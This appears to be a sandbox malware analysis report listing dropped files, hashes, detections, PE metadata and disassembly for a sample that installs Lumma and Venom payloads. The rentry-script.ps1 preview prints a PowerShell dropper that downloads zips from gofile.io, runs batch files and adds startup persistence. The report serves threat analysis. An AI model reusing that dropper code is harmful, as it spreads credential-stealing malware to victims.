                                                                              Preview:`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e..*...6.iE[..G.064...^P..j^..*H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^.....?...:gd.u.Z..6....oI..!.9...m.|.0..7.oR..

                                                                              C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):398336
                                                                              Entropy (8bit):5.845773382535582
                                                                              Encrypted:false
                                                                              SSDEEP:6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
                                                                              MD5:640C7C7EFAE54CC8DB95B07151C1E70D
                                                                              SHA1:F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
                                                                              SHA-256:E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
                                                                              SHA-512:694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):40376
                                                                              Entropy (8bit):5.902054884820747
                                                                              Encrypted:false
                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):49
                                                                              Entropy (8bit):4.476456017363834
                                                                              Encrypted:false
                                                                              SSDEEP:3:mKDDFRKnwdJI0CHhSnu/:hGwdxCHYno
                                                                              MD5:119839A00B05FCD9AED401736B817ACF
                                                                              SHA1:07F23D288EC1E8DE71F7D262D00172D419725EE2
                                                                              SHA-256:340034255D14BA5EE3E9F794064D81B675E2ACA6452D86F461583577C051EAF4
                                                                              SHA-512:545C68B5BB9B8249D8FEDA76792D9279AEE0482E26C261B9F2A5FE97D3496D208A6DB31BE3536D947CE1AF895AEA65365E9935738268129C8A6AC5FD3CC5CBD2
                                                                              Malicious:true
                                                                              Preview:@echo off..start "" /b "lm.exe" >nul 2>&1..exit..

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tdf2gw0.w44.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lq50vbam.goy.psm1

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzshxjj5.5v5.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1isdcpw.un4.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnwouy14.zqu.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyehpibx.euj.ps1

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\lumma.zip

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                              Category:dropped
                                                                              Size (bytes):528925
                                                                              Entropy (8bit):7.999322324722934
                                                                              Encrypted:true
                                                                              SSDEEP:12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR6DngMl:xhs/+oksg5CTyYa4wa9JJbus
                                                                              MD5:C326FE916E749D691CAEDBC7851F984C
                                                                              SHA1:ABF574E081288F7FC0D270A4ABD79372C7DAA3F2
                                                                              SHA-256:6E6199329BB1C1989E8D5266A5F57119E4454A4716DC5A1D16638D4BE645C1F0
                                                                              SHA-512:EF8899ADEB8396EF207243711038217BD50E1800C6BAA2D70C869A11BDA1F21D04D1C8CBC381111BF9311385116F6A27AD1DFF3A8E72D278079FBCDB46440293
                                                                              Malicious:false
                                                                              Preview:PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e..*...6.iE[..G.064...^P..j^..*H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....

                                                                              C:\Users\user\AppData\Local\Temp\rentry-script.ps1

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\6BC6.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):2511
                                                                              Entropy (8bit):5.252889385795675
                                                                              Encrypted:false
                                                                              SSDEEP:48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
                                                                              MD5:882093038301A8EB3C3310CE46E1075E
                                                                              SHA1:157D0D5855C2A66DFE02E06C43B4C56C640B64E6
                                                                              SHA-256:ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
                                                                              SHA-512:0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
                                                                              Malicious:true
                                                                              Preview:$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath

                                                                              C:\Users\user\AppData\Local\Temp\venom.zip

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                              Category:dropped
                                                                              Size (bytes):291328
                                                                              Entropy (8bit):7.998104019385177
                                                                              Encrypted:true
                                                                              SSDEEP:6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4DngzR:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dno
                                                                              MD5:28D7903413645482C1D71F0035F97A71
                                                                              SHA1:F242A96F853DABF990C93FA7BFC5EA5F375FFBE0
                                                                              SHA-256:60FD8AD928CB674568A778C3AAE2B063020888FA9D4DA3B364F65312BFE3C3DE
                                                                              SHA-512:2F29AA2310361ABDAF3420718C8EB38EA6DAC4DFB39E3424AA0272D0C722E27C6DC2A49C82B2E036C834C49FE84C548604EA148AF910515F336A122EB572BC87
                                                                              Malicious:false
                                                                              Preview:PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/*...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}*....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P

                                                                              C:\Users\user\AppData\Roaming\sbttifb

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):249856
                                                                              Entropy (8bit):5.7055988504204835
                                                                              Encrypted:false
                                                                              SSDEEP:3072:6DOCjVOtPZXeF+SOSNj/qw7OybwdOKgZn6rTzp2d8n/Xyor:spjVOtPZXeF+SOcj/qj4wdyZn6rPpxf
                                                                              MD5:0290BDE72B9F8D6F9B1EFDA467DB3A91
                                                                              SHA1:14D50EFEF82842167FD114FA3325FB3F9E887309
                                                                              SHA-256:26C54892680041A57956938E8C25981C808F2EC1DD947B5DB3B9DA4162CFDEF9
                                                                              SHA-512:AA314D1BB7830BEA1C2E5592ABA36C01B2D29791DD153D4236AD6B643D92D58E0D941429F5477808F8097D367DA33929BA65486F62AD6902D51AF7336953AA68
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 37%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tg.s... ... ... .pQ ... .pd ... .pP t.. .~i ... ... d.. .pU ... .p` ... .pg ... Rich... ........PE..L...A.{d.............................!............@..........................`.......-..........................................x...................................................................X...@............................................text............................... ..`.rdata...3.......4..................@..@.data........0......................@....wexubof.....`......................@..@.lixoweg.....p......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\sbttifb:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.7055988504204835
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:249'856 bytes
                                                                              MD5:0290bde72b9f8d6f9b1efda467db3a91
                                                                              SHA1:14d50efef82842167fd114fa3325fb3f9e887309
                                                                              SHA256:26c54892680041a57956938e8c25981c808f2ec1dd947b5db3b9da4162cfdef9
                                                                              SHA512:aa314d1bb7830bea1c2e5592aba36c01b2d29791dd153d4236ad6b643d92d58e0d941429f5477808f8097d367da33929ba65486f62ad6902d51af7336953aa68
                                                                              SSDEEP:3072:6DOCjVOtPZXeF+SOSNj/qw7OybwdOKgZn6rTzp2d8n/Xyor:spjVOtPZXeF+SOcj/qj4wdyZn6rPpxf
                                                                              TLSH:E734AE4576A4D839D7E305B09C74C2F925EEBCA28B38948B72983F1F3D711815E6B362
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tg.s... ... ... .pQ ... .pd ... .pP t.. .~i ... ... d.. .pU ... .p` ... .pg ... Rich... ........PE..L...A.{d...................

                                                                              File Icon

                                                                              Icon Hash:cd4d3d2e4e054d07

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4021ea
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x647B1F41 [Sat Jun 3 11:08:49 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:976b33a49b3619a38b3ab50dd40fd590

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F7248B948C8h
                                                                              jmp 00007F7248B90BCEh
                                                                              mov edi, edi
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push ecx
                                                                              push esi
                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                              push esi
                                                                              call 00007F7248B92350h
                                                                              mov dword ptr [ebp+0Ch], eax
                                                                              mov eax, dword ptr [esi+0Ch]
                                                                              pop ecx
                                                                              test al, 82h
                                                                              jne 00007F7248B90D59h
                                                                              call 00007F7248B91D3Fh
                                                                              mov dword ptr [eax], 00000009h
                                                                              or dword ptr [esi+0Ch], 20h
                                                                              or eax, FFFFFFFFh
                                                                              jmp 00007F7248B90E74h
                                                                              test al, 40h
                                                                              je 00007F7248B90D4Fh
                                                                              call 00007F7248B91D24h
                                                                              mov dword ptr [eax], 00000022h
                                                                              jmp 00007F7248B90D25h
                                                                              push ebx
                                                                              xor ebx, ebx
                                                                              test al, 01h
                                                                              je 00007F7248B90D58h
                                                                              mov dword ptr [esi+04h], ebx
                                                                              test al, 10h
                                                                              je 00007F7248B90DCDh
                                                                              mov ecx, dword ptr [esi+08h]
                                                                              and eax, FFFFFFFEh
                                                                              mov dword ptr [esi], ecx
                                                                              mov dword ptr [esi+0Ch], eax
                                                                              mov eax, dword ptr [esi+0Ch]
                                                                              and eax, FFFFFFEFh
                                                                              or eax, 02h
                                                                              mov dword ptr [esi+0Ch], eax
                                                                              mov dword ptr [esi+04h], ebx
                                                                              mov dword ptr [ebp-04h], ebx
                                                                              test eax, 0000010Ch
                                                                              jne 00007F7248B90D6Eh
                                                                              call 00007F7248B91EE8h
                                                                              add eax, 20h
                                                                              cmp esi, eax
                                                                              je 00007F7248B90D4Eh
                                                                              call 00007F7248B91EDCh
                                                                              add eax, 40h
                                                                              cmp esi, eax
                                                                              jne 00007F7248B90D4Fh
                                                                              push dword ptr [ebp+0Ch]
                                                                              call 00007F7248B9524Eh
                                                                              pop ecx
                                                                              test eax, eax
                                                                              jne 00007F7248B90D49h
                                                                              push esi
                                                                              call 00007F7248B951FAh
                                                                              pop ecx
                                                                              test dword ptr [esi+0Ch], 00000108h
                                                                              push edi
                                                                              je 00007F7248B90DC6h
                                                                              mov eax, dword ptr [esi+08h]
                                                                              mov edi, dword ptr [esi]
                                                                              lea ecx, dword ptr [eax+01h]
                                                                              mov dword ptr [esi], ecx

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [C++] VS2010 build 30319
                                                                              • [ASM] VS2010 build 30319
                                                                              • [ C ] VS2010 build 30319
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [RES] VS2010 build 30319
                                                                              • [LNK] VS2010 build 30319

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x219940x78.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x20480000xdce0.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x21a0c0x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x214580x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1bc.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1d5e00x1d6006d73525edc74bb8b769b5a3e3e3f5af2False0.8804022606382979data7.779881885510723IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x1f0000x33960x34005ef27bad30e8577c9f799976de6a99e0False0.36290564903846156data5.039939957881549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x230000x2022e8c0xdc0047b4252e8328c92816c1d6492b4fa015unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .wexubof0x20460000x2d30x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .lixoweg0x20470000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x20480000xdce00xde00099d8b5f4fddcfcb4cab1779da996407False0.3369404560810811data4.304203138172993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_CURSOR0x204ef380x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                              RT_CURSOR0x204f2680x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                              RT_CURSOR0x204f3c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                              RT_CURSOR0x20502680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                              RT_CURSOR0x2050b100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                              RT_CURSOR0x20510a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                              RT_CURSOR0x2051f500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                              RT_CURSOR0x20527f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                              RT_CURSOR0x2052d900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                              RT_CURSOR0x2052ec00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                              RT_CURSOR0x2052f980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                              RT_CURSOR0x2053e400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                              RT_CURSOR0x20546e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                              RT_ICON0x20486c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.4722814498933902
                                                                              RT_ICON0x20486c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.4722814498933902
                                                                              RT_ICON0x20495680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5852888086642599
